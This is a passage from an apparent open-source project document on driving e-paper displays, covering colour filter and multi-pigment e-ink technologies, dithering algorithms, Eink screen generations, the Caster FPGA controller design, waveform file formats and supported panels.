(Source: https://wiki.laptop.org/go/File:PixelLayoutDiagonal.png, public domain)

For example, if pixel 01 on the screen is green, then only the green component from the frame buffer should be sent to the screen. To get a basic 4096-color image display, this is everything needed. However, to improve image quality, a few more steps are generally applied:

Low pass filtering

The previously described image-displaying process is essentially a down-sampling process for each color component: only 1/3 of the pixels are sent to the screen. This then becomes a classic signal processing issue: sampling the signal causes frequency components above Nyquist to fold back into the low-frequency part. Or, in simpler words, you would see jagged edges/ aliasing: artifacts that weren't present in the original image. To prevent this, low pass filtering (blurring) needs to be applied to the image first to remove these high-frequency components.
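As a rough illustration of the two steps (filter, then subsample), here is a minimal sketch. The cfa_color() helper is a hypothetical stand-in for the panel's actual CFA layout, and the filter is a deliberately simple horizontal [1 2 1]/4 kernel; a real implementation would use a 2D filter matched to the layout, like the OLPC approach shown right after.

```c
#include <stdint.h>

// Assumed helper: returns which component (0=R, 1=G, 2=B) covers the
// physical pixel at (x, y). Depends on the specific panel's CFA layout.
extern int cfa_color(int x, int y);

// rgb: packed 8-bit RGB input, w*h*3 bytes. out: one byte per screen pixel.
void rgb_to_cfa(const uint8_t *rgb, uint8_t *out, int w, int h)
{
    for (int y = 0; y < h; y++) {
        for (int x = 0; x < w; x++) {
            int c = cfa_color(x, y);
            // Low-pass the selected component before subsampling, to
            // reduce the aliasing described above. Edge pixels reuse
            // the center sample.
            int l = rgb[(y * w + (x > 0 ? x - 1 : x)) * 3 + c];
            int m = rgb[(y * w + x) * 3 + c];
            int r = rgb[(y * w + (x < w - 1 ? x + 1 : x)) * 3 + c];
            out[y * w + x] = (uint8_t)((l + 2 * m + r) / 4);
        }
    }
}
```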
The following diagram from the OLPC wiki shows a simple way of implementing such a filter:

(Source: https://wiki.laptop.org/go/File:PixelProcDiagonal.png, public domain)

Dithering

Dithering can be applied to further improve image quality. See the dithering section for more details.

Multi-Pigment Color Display

Another technology for implementing color EPDs is the multi-pigment color display. This technology was developed initially by SiPix and further improved by Eink. The basic idea is to use ink particles with different colors inside a single pixel. By applying a sequence of voltages, the ink particles can be arranged to display different colors.

(Source: https://www.eink.com/tech/detail/How_it_works , copyright Eink Corporation)

One major advantage of this solution is that it can achieve higher resolution (no CFA, so no resolution reduction), higher reflectivity (no CFA, so no light loss), and higher color saturation (no CFA, so no need to play the reflectivity-vs-saturation trade-off game). Eink has 2 lines of products using this technology: Eink Gallery and Eink Spectra.

So the advantage is that it's much brighter compared to CFA-based solutions. The disadvantage is that it's much more difficult to drive, and quite slow: 1st/ 2nd gen Eink Gallery screens take 30s (!) to refresh, and Spectra 6 Plus devices take 7s to refresh. It's possible to trade some color saturation for higher speed, though it remains much slower than CFA-based solutions. The specific product lines will be discussed in Eink Screen Generations.

How ACeP Waveform Works

To be written (TODO)

How to get more colors on ACeP

This is possible with a modified waveform. To be written (TODO)

What Happened To ACeP?

ACeP was supposed to be the "next big thing" in eReaders. Back in late 2022, Eink announced that "Gallery 3 has moved into mass production, with customer products from Bigme, BOOX, iFlyTek, iReader, PocketBook, Readmoo, and AOC coming down the pipeline in 2023 and beyond". But 2023 passed with exactly one product, the Bigme Galy, released to mixed reception. In early 2024, it was announced that the Bigme Galy had been discontinued, and Eink announced EOL for certain ACeP-based products. It does sound like ACeP is now dead.

The following is purely my speculation. But I see this as 2 separate decisions:

~~There will be no more multi-pigment-based displays for the eReader market~~

ACeP (CMYW) is being replaced with Spectra 6 (RYBW) in other markets

The second one is evident from the EOL notice linked previously: the 7.3" ACeP screen has a direct replacement in the 7.3" Spectra 6 screen. One major drawback of ACeP in the digital signage market (as far as I can see) is its inability to reproduce cyan. This means there is no good way to display a blue sky on an ACeP screen, not even through dithering; it's simply outside of its color gamut. By changing the base colors used, Eink was able to mitigate this issue in the Spectra 6 product lines.

The first one is more or less speculation. (UPDATE: I WAS WRONG, read on.) I have two clues for that. One is the fact that Eink is doubling down on digital signage for Spectra 6: both the 13.3" and 31.5" Spectra 6 screens will have an integrated controller. This makes them much more interesting for signage applications, but unsuitable for eReader applications.
The other is that the 8" Spectra 6 Plus screen , while using the same backplane as the Gallery 3 ACeP screen, now quote a 7 second refresh time (compared to less than a second on Gallery 3). If Eink still wanted to make a Spectra 6 eReader screen, this 8" backplane would be the one to use given it was used in the ACeP product line. Objectively, the ACeP screen on the Bigme Galy pretty much doesn't make any sense anyway. It suffers from poor reflectivity and poor saturation to a point where it's not much better than Kaleido (see the previous photo). The difference between Gallery 3 and Gallery Palette (which is supposed to be a lower-end product) is also stunning: (Original illustration copyright MiHoYo) The one on the left is the Gallery 3 used on eReaders, and the one on the right (brighter and more saturated one) is the Gallery Palette used on ESLs. Though to be honest I hacked the right one a bit to display 512 colors opposed to the stock 7 colors. If Gallery 3 had the same image quality as previous ACeP/ Gallery screens, it would make sense to trade in response time for better image quality. But it doesn't. So is the ACeP dead? Yes and no. ~~Yes in the sense that we are less likely to see any new ACeP products in the future~~, and we are also unlikely to see any Spectra 6-based eReader products. No in the sense that ACeP is superseded by Spectra 6, so the technology lives on. Just like how the Pearl replaced the Vizplex, and the Carta replaced the Pearl. Now we have Carta so we don't look back to the older generation of screens. Also, in another sense, there are likely at least thousands of ACeP screens already manufactured but haven't been made into consumer devices. We will probably see these screens in the not-too-distant future! UPDATE: As pointed out in a reddit post by Disastrous_Analyst_1 , Eink in their 2023 Annual Report said that "In 2024, we will provide an upgraded version of the 8-inch advanced color ePaper (Gallery™ 3), aiming to deliver optimized performance and enhanced visual experience for customers. (在 2024 年,我們將進一步提供進階版 8 吋先進彩色電子紙(Gallery ™ 3),期待能提 供更優化的性能及更好的視覺體驗給客戶)" in V. Operational Highlights, 5.1 Business Activities, 5.1.2 Industrial Overview, 3. Product Developmenet Trends, A. eReader. This means we might be able to see more Gallery 3 (or similar technology) based eReaders in the years to come. Dithering Eink and DES panels typically only support up to 16 levels of greyscale with the vendor-provided waveform. To improve response time, or to avoid flashing images, a binary (1-bit, 2-level) display is also used. Dithering could be applied to produce better images (increasing SNR, in signal processing sense). The following is applying dithering to a simple black-to-white gradient. Note the results are not optimal due to limitations in quantization and incorrect gamma correction. But the idea is the same. | Original | Binary No-dithering | 2 Row Sierra Dithered | |-|-|-| | | | | Dithering can help when the screen has a native 16-level greyscale as well: | Original | 16 Level Greyscale No-dithering | 16 Level Greyscale Dithered | |-|-|-| | | | | As you can see, the non-dithered image loses all the greyscale in between, while the dithered version on the right gives the illusion of greyscale while only using full black and full white colors. To understand it further, take the following example: Say the source image is 30% brightness (or 0.3). This cannot be displayed on a binary screen which can only display 0% (0.0, black) or 100% (1.0, white) brightness. 
A simple thresholding process can determine whether the screen should display 0 or 1 by checking the incoming brightness: if it's less than 0.5, the display brightness is rounded down to 0, otherwise up to 1. Because 0.3 is always lower than 0.5, the whole screen displays 0 (black). This is less than ideal. A better way is to set around 30% of the pixels white and 70% of the pixels black, so the average brightness matches. Different dithering algorithms can be used to achieve this 30/70 distribution. Two common methods are ordered dithering and error-diffusion dithering, described below.

Ordered Dithering

Ordered dithering adds a pre-computed/ fixed texture to the image before the thresholding process. In other words, it basically adds some noise to the image. This may sound counterproductive at first, but the effect of the noise is easy to see in the example.

Continue with the previous example of displaying 30% brightness grey on a binary screen. The goal is to let the rounding process end up with 1 for 30% of the time and 0 for 70% of the time. This can be achieved by adding noise. In the simplest case, a random number with a uniform distribution over [-0.5, 0.5] is added to the incoming brightness. The brightness has a value of 0.3; after adding the random number, the result has a uniform distribution over [-0.2, 0.8]. The threshold is still set to 0.5, and the probability distribution now looks like this:

The pixel now has a 30% chance of being rounded up to 1, and a 70% chance of being rounded down to 0. Before dithering, it would always be rounded down to 0.

However, a purely random number is generally not the best noise to use. A Bayer dithering matrix or blue noise is more commonly used, with results as illustrated below. The idea is the same, but instead of adding random numbers, a pre-computed number from the Bayer dithering matrix (array) or a blue noise texture (array) is added to the image.

| Random Dithering| Bayer Dithering | Blue-noise Dithering |
|-|-|-|
| | | |

Error-Diffusion Dithering

The basic idea is that when rounding down the color (selecting the closest color, e.g. from the 16-level greyscale given 256-level input), the error value (difference) is calculated and added to neighboring pixels, so this error is taken into account when those pixels are processed later. The whole process is called error diffusion.

Still using the previous example of a 30% brightness image, assume an extremely simple dither kernel: diffuse all the error to the next pixel. Let's see it in action.

For the first pixel, 0.3 (image brightness) is less than 0.5 (threshold), so it's displayed as 0 (black). This introduces a 0.3 error: the displayed color is 0.3 darker than the requested color. So 0.3 is diffused to the next pixel, hoping the next pixel can correct the error.

On to the second pixel. The value is 0.3 (image brightness) + 0.3 (diffused error) = 0.6. It's now larger than 0.5 (threshold), so it's displayed as 1 (white). This introduces a -0.4 error: the displayed color is 0.4 brighter than the requested color. -0.4 will be diffused to the next pixel.

For the 3rd pixel, the value is now 0.3 - 0.4 = -0.1. This is less than 0.5 and displayed as 0 (black). The error of -0.1 is diffused further. And this process just goes on. With enough pixels, it eventually yields about 30% white pixels and 70% black pixels.

Similar to how a purely random value is not the best choice for ordered dithering, diffusing all the error to the right is also less than ideal.
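The walkthrough above translates to only a few lines of code. This is a sketch of the deliberately simplistic diffuse-everything-to-the-right kernel, just to show the mechanism (function name is made up; brightness is assumed to already be in a linear 0.0-1.0 range, see Gamma Correction below):

```c
#include <stdint.h>

// 1-bit dithering of one row, diffusing the entire error to the next
// pixel on the right (illustrative only; real kernels are 2D).
void dither_row(const float *in, uint8_t *out, int n)
{
    float err = 0.0f; // error carried over from the previous pixel
    for (int i = 0; i < n; i++) {
        float want = in[i] + err;        // requested brightness + diffused error
        out[i] = (want >= 0.5f) ? 1 : 0; // 1 = white, 0 = black
        err = want - (float)out[i];      // what we failed to display
    }
}
```

Fed with a constant 0.3, this produces exactly the 0, 1, 0, ... sequence from the walkthrough, and about 30% of the output pixels end up white.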
Diffusing everything to a single neighbor creates very repetitive patterns. I mentioned the word kernel: error diffusion uses a diffusion kernel, which specifies the targets and percentages of the diffused error. There are many classic kernels, such as Floyd-Steinberg, Stucki, Sierra, etc., commonly used for image dithering. They all diffuse to more than 1 pixel to improve the overall look of the image. As shown below, even just diffusing the error to 2 pixels (half of the error goes to the pixel on the right, and the other half goes to the pixel below) yields a much better result:

| Dither to Right | Right and Down | Floyd-Steinberg |
|-|-|-|
| | | |

Applying Dithering on CFA-based Color Screens

Dithering can be applied to CFA-based color screens such as Eink Kaleido and color DES screens as well. The following is on a simulated DES screen (the original on the left assumes the screen has native 24bpp color, still simulated):

| 16M color DES (does not exist) | 8-color DES | 8-color DES Dithered |
|-|-|-|
| | | |

Ordinary dithering kernels don't work too well on color screens. For example, the error-diffusion dithering process pushes/ diffuses error to neighboring pixels without considering their color. Ideally, it should diffuse the error only to pixels of the same color. This is fairly easy to fix though: with a tweaked kernel, error diffusion achieves good results on CFA-based screens as well. (I am going to shamelessly call it Wenting's kernel.)

| 16M color DES (does not exist) | 8-color DES naively apply Floyd-Steinberg (wrong) | 8-color DES with Wenting's kernel |
|-|-|-|
| | | |

Of course, one can apply Bayer-like ordered dithering, blue-noise dithering, or dithering in 4096-color mode as well:

| 8-color DES Bayer-like | 8-color DES Blue-noise | 4096-color DES Error-diffusion |
|-|-|-|
| | | |

It's called Bayer-like because, similar to how naive error diffusion doesn't work, the Bayer matrix has to be modified to work on a color screen.

Gamma Correction

Another thing to consider is gamma. The dithering process involves a step of selecting the closest value. However, the closest numerical value is not necessarily the closest color. Images are typically in the sRGB space, which is non-linear. This causes the simple rounding to pick the wrong color and to calculate the wrong error value. One solution is to work in linear space instead. This is also known as gamma-aware dithering. You can read more about this online, for example here: https://learnopengl.com/Advanced-Lighting/Gamma-Correction .

The difference is quite evident when dithering down to 1 bit for a color screen. The top left is the original image, the top right is dithered in the sRGB space, and the bottom left is dithered in the linear space.

Further Reading

See https://en.wikipedia.org/wiki/Dither for more information about dithering.

Eink Screen Generations

Depending on how you count, there are multiple generations of Eink screens commercially available. For monochrome screens before 2023, it's possible to tell the generation by looking at the 6th digit of the serial number: that is the FPL code in the following table:

| FPL Platform | FPL Code | Panel Model | Marketing Name | First Introduced |
| ------------ | -------- | -------------- | ----------------------- | ---------------- |
| 2.0 | 0 | | | ? |
| 2.1 | 1 | | | 2004 |
| 2.3 | 2 | | | ? |
| V100 | 3 | | Vizplex | 2007 |
| V110 | 4 | | Vizplex | 2008 |
| V110A | 5 | | Vizplex | 2008 |
| V220 | 6 | VA3200 | Pearl | 2010 |
| V250 | 7 | | Pearl | ? |
| V220E | 8 | | Pearl | ? |
| V320 | 9, R | VB3300 | Carta 1.2 / 1000 | 2013 |
| V320 | ? | VB3300? | Carta 1100 | 2019 |
| V400 | A, C | VD1400/ VD1405 | Roadrunner / Carta 1200 | 2021 |
| V450 | ? | VH1948 | Carta 1250 | 2021? |
| ? | ? | VD1405 | Carta 1300 | 2023 |

Data points used to create the table above:

- The first commercialized Eink e-reader, the SONY Librie, hit the market in 2004, likely with an ED060SC1 panel
- ED060SC1 has an FPL code of 1 on the barcode, meaning the 2.1 platform
- Multiple datasheets (like the one for the ED060SC4) confirm the 6th digit marks the FPL code, with mappings for V220/220E/320/400
- Inkwave's WBF decoder (originating from Kindle GPL kernel code) provides an FPL platform to FPL code mapping table that matches the info from the datasheets well
- The Kindle Oasis 3 was reported to use a Carta 1100 screen, and it has an ED070KC3 screen with a V320 FPL platform
- The Kindle PW5 was reported to use a Carta 1200 screen, and it has an ED068KC5 with a VD1405 panel model
- The Kobo Clara BW was reported to use a Carta 1300 screen, and it has an ED060KHE with a VD1405 panel model
- The datasheet of the ED068KC1 mentions the name "Roadrunner" for the 400 platform, but that name never gets used outside of it. I would guess they were going to use Roadrunner for the new generation but eventually fell back to Carta 1200, so it's more like an incremental improvement
- From the information available, it really looks like Carta 1000 and 1100 use the same film, and Carta 1200 and 1300 use the same film. If this is true, it may sound like a scam that they are named differently but use the same film. But this is actually okay. Just like how chips usually go through a binning process and the same chip sells under different product names with different performance levels, it's reasonable for Eink to make incremental improvements in the manufacturing process to yield better screens with the same film and sell them under a different name, or to simply bin screens into different grades sold under different names.

I will let you decide how to count the generations.

For the CFA-based screens, the following generations of screens exist:

Eink Triton: First generation color screen. Uses an RGBW glass color filter and square pixels. The underlying screen panel uses Pearl film.

Eink Triton 2: 2nd generation color screen. Uses an RGB glass color filter and stripe pixels. The underlying screen panel uses Pearl film.

Eink Kaleido: 3rd or 2nd gen color screen depending on the definition. Uses an RGB color filter. Each pixel is still square, but each color covers 3 pixels. The underlying screen panel uses Carta film.

Eink Kaleido Plus: 2nd gen Kaleido. Uses an RGB color filter. Each pixel is still square, but different configurations exist: some screens have each color covering 2 pixels, others have each color covering only 1 pixel. The underlying screen panel uses Carta film.

Eink Kaleido 3: 3rd gen Kaleido. At least 2 different configurations exist: one features an RGB filter covering 1 pixel per color, the other features a 2R/2G/1B configuration, on average 5/3 pixels per color. The underlying screen panel uses Carta 1000/1200/1250/1300 film depending on the model.

Eink Kaleido 3 Outdoor: Wide temperature version of Kaleido 3.

As far as I know, no CFA-based color screen panels come with an integrated controller.
For the multi-pigment color screens based on SiPix technology, the following generations of screens exist (color abbreviations: B: black, W: white, R: red, Y: yellow, B: blue, C: cyan, M: magenta):

Eink Spectra 3000: BWR or BWY 3-color screen.

Eink Spectra 3100: BWRY 4-color screen.

Eink Spectra 3100 Plus: BWRY 4-color screen. Orange is now possible with driver circuit changes.

Eink Spectra 6: RYBW 4-color screen. Can reproduce 6 different colors by mixing colors.

Eink Spectra 6 Plus: RYBW 4-color screen. Still reproduces 6 different colors; allows faster refresh than Spectra 6 with driver circuit changes.

Eink Gallery (also known as Gallery 4000): CMYW 4-color screen (ACeP).

Eink Gallery Plus (also known as Gallery 4000): CMYW 4-color screen (ACeP).

Eink Gallery Palette (also known as Gallery Palette 4000): CMYW 4-color screen (ACeP). Reproduces 7 different colors.

Eink Gallery 3: CMYW 4-color screen (ACeP). Reproduces around 10 different colors; much faster than other Gallery screens at the cost of lower saturation and lower reflectivity.

There are both integrated-controller and controller-less Spectra/Gallery screens.

Additional notes regarding the multi-pigment color screens:

ACeP, or Advanced Color ePaper, refers to the CMYW 4-color screens; it is not a product line on its own.

To be honest, I don't know how many colors can be reproduced on Gallery or Gallery Plus screens based on public information. The spec sheet for the AC133UT1 suggests it might be 8 colors. Eink claims 32000 or 60000 colors in their materials, but they also clarified that these numbers refer to the color gamut. In other words, they represent color saturation rather than the number of different colors that can be displayed on screen. Dithering is heavily used to display color images on Gallery screens.

It's possible to achieve more colors on Gallery Palette screens; 7 is not a physical limit.

The Gallery 4000 rebranding happened in 2020; however, Eink never seems to use that name on their website.

Design of Caster and Glider

This section describes the design specifics of Caster and Glider. The following is an overall block diagram showing both hardware and gateware components in the signal chain:

Gateware Architecture

The FPGA gateware is divided into multiple modules. The caster.v is the top level of the EPDC core design, but several additional components are connected under top.v to form a complete image processing system. Components are generally inter-connected with synchronous or asynchronous (in the case of clock domain crossing) FIFOs. The top-level design has 3 major clock domains:

clk_vi: Input video clock domain, running at ½ pixel rate.

clk_epdc: EPDC clock domain, running at ¼ pixel rate.

clk_mem: Memory clock domain, running at ¼ memory transfer rate.

To understand how it works, the following is a guided tour through the life cycle of a pixel. Before an incoming pixel can be processed by the controller, the memif module needs to retrieve the local pixel state from the DDR SDRAM. Once the value is retrieved, it's pushed into the state readout/ input FIFO (bi_fifo). At/ around the same time, the input video stream is pushed into the video input FIFO (vi_fifo). The EPDC runs a local Eink timing generator for counting pixels and blankings. This timing should be a slightly delayed version of the incoming video timing.
Once the local timing generator determines that it needs to output a pixel soon, the EPDC logic pops one pair of video input and state readout values and starts processing. The two values go through the video processing pipeline:

Stage 1: This pipeline stage waits for the FIFOs to output the data.

Stage 2: The 8-bit input image is dithered down to 1-bit and 4-bit at this stage for later use.

Stage 3: The waveform lookup is done at this stage for 16-level grayscale modes.

Stage 4: Based on the pixel state, the new state and the voltage selection value are determined at this stage.

Stage 5: The new state is pushed into the state writeback/ output FIFO (bo_fifo) and the voltage selection is sent to the screen.

The memif module later pops the writeback value from the bo_fifo and writes it back to the DDR SDRAM.

The EPDC always processes 4 pixels per clock. For screens with different interface widths, a rate adapter is added after the EPDC output. Some logic is duplicated 2 or 4 times (such as the waveform RAM or the pixel decision logic), while some is extended and daisy-chained (such as the error diffusion dithering unit) to achieve the 4-pixels-per-clock throughput.

Firmware Functions

The MCU manages housekeeping items as described below. It currently doesn't use any operating system, but rather relies on a main-loop style of operation.

EPD Power Supply: The power supply provides the common, source, and gate supplies to the EPD panel. In addition to a basic on/off switch, the MCU can also adjust the VCOM voltage and measure the optimal VCOM voltage of the installed panel. The VCOM measurement is done by isolating the VCOM supply from the screen while keeping the gate supply, scanning the screen with source = VCOM, and measuring the kick-back voltage on the VCOM rail.

FPGA Bitstream Loading: The FPGA doesn't have its own flash memory; the bitstream is pushed over SPI from the MCU to the FPGA upon power-up. This way, the FPGA bitstream can easily be bundled with the MCU's firmware and updated together with it.

Type-C Negotiation: The onboard USB Type-C port can support video input in addition to powering the board, using the USB-C DisplayPort Alt Mode. The MCU runs a USB-C PD stack to communicate this capability to the video source device over the standard USB PD protocol. The MCU also controls the Type-C signal mux to remap the lanes to the correct place depending on the cable orientation.

Video decoder initialization: The FPGA used on the board doesn't have high-speed deserializers to directly interface with common high-speed video interfaces such as DisplayPort or DVI. Instead, dedicated video decoder chips are used on the board. They typically need initialization before use, and the MCU takes care of this. In this specific design, the DP decoder chip also handles AUX P/N line flipping based on the Type-C cable orientation.

PC communication: One advantage of the Caster is that update modes and forced update/ clearing can be applied on a per-pixel basis. Software may utilize this to assign different modes to different windows, or change update modes on the fly depending on the content. This is done by sending requests to the MCU over a USB connection. The MCU runs TinyUSB and presents itself as an HID device so it can forward messages between the host PC and the FPGA.

Low Latency Drive

The Caster implements several techniques for reducing latency, which are explained here. As described before, the existing basic driving method employs a global counter for looking up the waveform table.
This imposes a limit on the global image update rate: the controller only accepts a new incoming image after the previous update is finished. The update usually takes about 100ms, translating to an image rate of 10Hz. Or, in other words, the user potentially needs to wait up to 100ms before a new image is even processed by the controller.

One way to mitigate this issue is to have multiple update regions. For example, imagine the user is typing "a" and then "b". In a single-region controller design, "a" is drawn to the screen immediately, while "b" needs to wait 100ms before it gets drawn. If the controller supports multiple regions, it can start drawing the letter "b" as soon as it's typed, reducing the latency. This however requires the software to program the controller to correctly set the region to the letter boundary, and to re-allocate regions on the fly, as the number of regions is generally quite limited (like 4-16). The Caster simply treats every pixel as an individual update region, which provides maximum flexibility and is transparent to the software.

Another latency optimization the Caster implements concerns pixels that are already being updated. For example, suppose the user types the letter "a" and deletes it right after. With the basic driving method, the controller needs to wait until the letter "a" is fully displayed before it can erase it. The previously proposed/ implemented regional update doesn't help here, because the same pixel is involved, so it has to be in the same region. The second technique is early cancellation: if a pixel changes before it's fully driven, instead of waiting for it to be fully driven, it's immediately driven toward the newly requested state, and the frame counter is updated according to the newly calculated driving time.

By combining both, it's possible to implement low-latency binary and 4-level grayscale modes. The tradeoff between frame rate and contrast ratio is also no longer relevant: both a high frame rate and a high contrast ratio are achieved automatically.

Hybrid Greyscale Mode

As discussed previously, getting greyscale images on Eink is a sophisticated process: much slower than binary, and flashing during the update. This poses challenges for making it useful to users. On eReaders, the software can switch between fast and slow modes based on the action. The eReader software may also simply not support things that don't work well on the screen; for example, there might be no scrolling, only whole-page flipping. What existing eink monitors do is throw the problem back to the user: the user simply has to accept that the update is slow, the latency is long, and the process is flashing.

What the Caster implements is switching between the fast binary mode and the slow greyscale mode automatically, on a per-pixel basis. When the input image changes, it switches to binary mode and does the update. When the image hasn't changed for a while, it re-renders the image in greyscale.

Limitations

The method does come with downsides: it requires much more memory bandwidth to implement. Take a 1080P panel as an example (roughly 120 Mp/s (million pixels per second) with reduced blanking). With the traditional method, the controller only needs the old pixel state and the new pixel state (4bpp each) to determine the voltage needed, i.e. an 8-bit/ 1-byte memory read per pixel. The bandwidth requirement is then 120Mp/s x 1B/pixel = 120MB/s. A single 16-bit SDR-133 SDRAM is more than enough to handle this.
The Caster currently stores a 16-bit state per pixel (for 2 sets of old pixel values and pixel-specific timer counters), and the pixel state needs to be updated every frame, so the pixel state buffer alone requires a 2-byte read and a 2-byte write per pixel. It takes another 0.5 bytes per pixel to read the new image value from memory: 120Mp/s x 4.5B/pixel = 540MB/s. A 16-bit DDR-333 memory is then needed to implement this. The Glider hardware uses DDR3-800 memory to allow even higher resolutions.

If the controller is not integrated inside an SoC (as in our case: the controller sits inside the monitor, not in your PC's CPU/GPU), it also needs to use actual low-latency video interfaces like DVI or DP, instead of simpler but slower interfaces like USB or I80/SPI. This could drive up costs as well.

These techniques also don't help with use cases like reading books, so commercial e-reader solutions have little reason to go through the extra trouble of implementing them.

Hardware Design Decisions

To be written (TODO)

Resource Utilization

The following numbers are for reference only and will vary depending on RTL options and specific targets.

1704 FF
2531 LUT6
60 KB BRAM

Building PCB

The PCB is designed with KiCAD 8.0. To get optimal results, use a 4-layer stackup with 1080 PP layers, but 2313 or 3313 are also acceptable.

There are 2 versions of the mainboard: a full version and a lite version. For now, only the full version is being actively worked on. The lite version removes the dedicated external decoders for DVI/ DP and removes the bulk of the Type-C circuitry to lower the cost. Its only video interface is a DVI port feeding directly into the FPGA.

FPGA Bitstream

To be written (TODO)

MCU Firmware

To be written (TODO)

Working with Waveforms

The following section describes the waveform file formats and how to use them.

Obtaining Waveform

In general, the screen vendor (Eink, Good Display, etc.) should provide the waveform file. If your screen has a flash chip on it, it's also possible to extract the waveform from a flash dump:

dd if=somedump.bin of=waveform.wbf bs=1 skip=2182

If you have access to an application board, it might also be possible to extract the waveform there. For example, if the system uses a T1000 controller, the waveform is usually stored in the SPI flash connected to the T1000.

Waveform Formats

E-Ink distributes waveforms in the wbf file format. SoC/ Eink controller hardware often requires converting the file into a vendor-specific format. Caster/ Glider also uses its own binary format. This project defines a common human-readable format (Interchangeable Waveform Format, IWF) and provides several tools for working with the different binary formats and the IWF format.

Interchangeable Waveform Format

The waveform consists of one descriptor file with the iwf extension (ini format) and various LUT data files in csv format.
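Before the field-by-field description below, here is a hypothetical minimal descriptor to show the shape of the format. All values here are made up for illustration and do not correspond to any real screen or waveform:

```ini
; example.iwf -- hypothetical IWF descriptor (values are made up)
VERSION = 2.0
NAME = example_waveform
BPP = 4
PREFIX = example
MODES = 2
TEMPS = 2
T0RANGE = 0
T1RANGE = 25
TUPBOUND = 50
TABLES = 2
TB0FC = 38
TB1FC = 10

[MODE0]
NAME = GC16
T0TABLE = 0
T1TABLE = 0

[MODE1]
NAME = DU
T0TABLE = 1
T1TABLE = 1
```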
The descriptor contains the following required fields:

VERSION: the version of the descriptor (should be 2.0)
NAME: (optional) original name of the waveform
BPP: (optional, default 4) 4 or 5, representing the internal state count used by the waveform
PREFIX: the filename prefix for the actual waveform files
MODES: the total number of modes supported by the waveform
TEMPS: the total number of temperature ranges supported by the waveform
TxRANGE: the supported temperature in degC, where x is the temperature ID
TUPBOUND: (optional) upper bound for the temperature ranges; each range is TxRANGE to Tx+1RANGE (or TUPBOUND in the case of the last one)
TABLES: total number of LUTs inside the waveform
TBxFC: the frame count for the table, where x is the LUT ID

Each mode has its own mode section named [MODEx], where x is the mode ID, containing the following fields:

NAME: the name of that mode
T*TABLE: the table used for each temperature in that mode

There should be a number of LUTs, saved under filenames like PREFIX_TBx.csv, where x is the LUT ID. Each csv file should contain a LUT of the form lut[src][dst][frame], which specifies, for a transition from the src greyscale level to the dst greyscale level, at a certain frame in the frame sequence, what voltage should be applied to the screen (0/3: GND / Keep, 1: VNEG / To black, 2: VPOS / To white). Each line contains the frame sequence for one or more source-to-destination pairs. For example:

4,7,1,1,1,0,2 means that to transition from greyscale level 4 to greyscale level 7, there should be 5 frames, applying VNEG VNEG VNEG GND VPOS

0:14,15,2,2,2 means that to transition from any greyscale level between 0 and 14 to greyscale level 15, there should be 3 frames, applying VPOS VPOS VPOS

These are provided only to illustrate the file format; they are not valid or meaningful Eink driving sequences.

Converting

The following converters are provided in the repo:

To convert from iwf to fw (iMX6/7 EPDC format): ./mxc_wvfm_asm v1/v2 input.iwf output.fw

To convert from fw to iwf: ./mxc_wvfm_dump v1/v2 input.fw output_prefix

To convert from wbf to iwf: ./wbf_wvfm_dump input.wbf output_prefix

Compatible Screens

This project only focuses on driving off-the-shelf active matrix electrophoretic displays without integrated controllers. See Screen Panel Types for the differences between the types of screen panels available. That being said, this project is compatible with the majority of these panels, including sizes from 4.3" up to 13.3", and potentially panels as large as 42" (an additional power supply is required in that case).

Screen Adapters

Different screen panels have different connectors. It would take a huge amount of space to have every possible screen connector on the motherboard. Instead, a series of screen adapters is provided to adapt to screens with different pinouts.

The mainboard natively supports certain 40-pin screens, such as:

10.3" 1872x1404: ED103TC1, ES103TC2
10.1" 2232x1680: GDEW101M01, GDEW101C01

To see which adapter might work for your screen, check out Appendix 1 - Screen List.

Pixel Rate Considerations

The input protocol and processing rate limit which screen models are supported.
Limit from processing rate (logic and routing delay): Processing rate when dithering enabled: 133 MP/s Processing rate when dithering disabled: 280 MP/s Estimated processing rate with 8-wide design: 500 MP/s Limit from video interface: Maximum pixel rate using DVI (with ADV7611): 165 MP/s Maximum pixel rate using DVI (direct deserializer): 105 MP/s Maximum pixel rate using DisplayPort (with PTN3460): 224 MP/s Maximum pixel rate using DisplayPort (with 7-series 6G SerDes): 720 MP/s Maximum pixel rate using MIPI (with 1.05Gbps LVDS): 230 MP/s Limit from memory interface (assuming 90% BW utilization): SDR-166 x16: 60 MP/s SDR-166 x32: 120 MP/s DDR-400 x16: 180 MP/s DDR2/3-667 x16: 300 MP/s DDR2/3-800 x16: 360 MP/s DDR2/3-1066 x16: 480 MP/s DDR2/3-800 x32: 720 MP/s Common screen resolution peak pixel rate (with CVT-RBv2): 1024x758 (6.0") @ 85Hz: 74 MP/s 1448x1072 (6.0") @ 60Hz: 101 MP/s 1448x1072 (6.0") @ 85Hz: 145 MP/s 1600x1200 (13.3") @ 60Hz: 125 MP/s 1600x1200 (13.3") @ 85Hz: 178 MP/s 1872x1404 (10.3") @ 60Hz: 169 MP/s 1872x1404 (10.3") @ 85Hz: 243 MP/s 1920x1440 (8.0") @ 60Hz: 177 MP/s 1920x1440 (8.0") @ 85Hz: 255 MP/s 2200x1650 (13.3") @ 60Hz: 232 MP/s 2200x1650 (13.3") @ 85Hz: 333 MP/s 2560x1600 (12.0") @ 60Hz: 261 MP/s 2560x1600 (12.0") @ 85Hz: 374 MP/s 2560x1920 (13.3") @ 60Hz: 313 MP/s 2560x1920 (13.3") @ 85Hz: 449 MP/s 3200x1800 (25.3") @ 60Hz: 364 MP/s 3200x1800 (25.3") @ 85Hz: 522 MP/s ( Calculate yourself: Video Timings Calculator by Tom Verbeure ) Rendering the grayscale requires the screen to be refreshed at 85Hz (85Hz is the supported refresh rate by Eink, 60Hz can be made to work with some effort in some cases). Running an input refresh rate lower than the internal refresh rate incurs additional processing latency from both source (PC) and monitor due to buffering. Case A reference case design is provided. The case is 3D printable and designed with FreeCAD. Note the design is currently outdated. References Here is a list of helpful references related to driving EPDs: Reverse engineering and explanation on driving EPDs: http://essentialscrap.com/eink/index.html An early Eink DIY project with many useful info: http://spritesmods.com/?art=einkdisplay&page=1 STM32 Software bit-banging EPD driver with grayscale: https://hackaday.io/project/11537-nekocal-an-e-ink-calendar ESP32 board designed for driving parallel EPDs: https://github.com/vroland/epdiy An early tool for reading Eink's wbf file format: https://github.com/fread-ink/inkwave A more up-to-date Eink's wbf format parser: https://patchwork.kernel.org/project/linux-arm-kernel/patch/20220413221916.50995-2-samuel@sholland.org/ On the topic of color screen resolution, color mapping, and subpixel rendering: Klompenhouwer, Michiel A., and Erno H. A. Langendijk. “59.4: Comparing the Effective Resolution of Various RGB Subpixel Layouts.” SID International Symposium Digest of Technical Papers, vol. 39, 